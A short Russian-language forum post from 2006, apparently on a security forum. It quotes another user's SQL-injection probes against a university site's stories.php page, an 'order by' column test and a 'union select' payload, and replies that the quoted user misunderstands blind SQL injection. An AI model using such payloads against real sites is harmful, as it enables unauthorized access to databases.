23.10.2006, 12:00
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Сообщение от 1ten0.0net1
http://www.university.edu/stories.php?id='157' order by 88/*
Текст исчезает, а у нас появляется точная уверенность в том, что мы имеем на руках (на сервере) blind SQL-injection.
Сообщение от 1ten0.0net1
http://www.university.edu/stories.php?id='-157' union select 1, 2, 3/*
Приход состоялся - наблюдаем цифры.
Хм. мне показалось, что ты не совсем понимаеш суть
blind SQL-injection.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|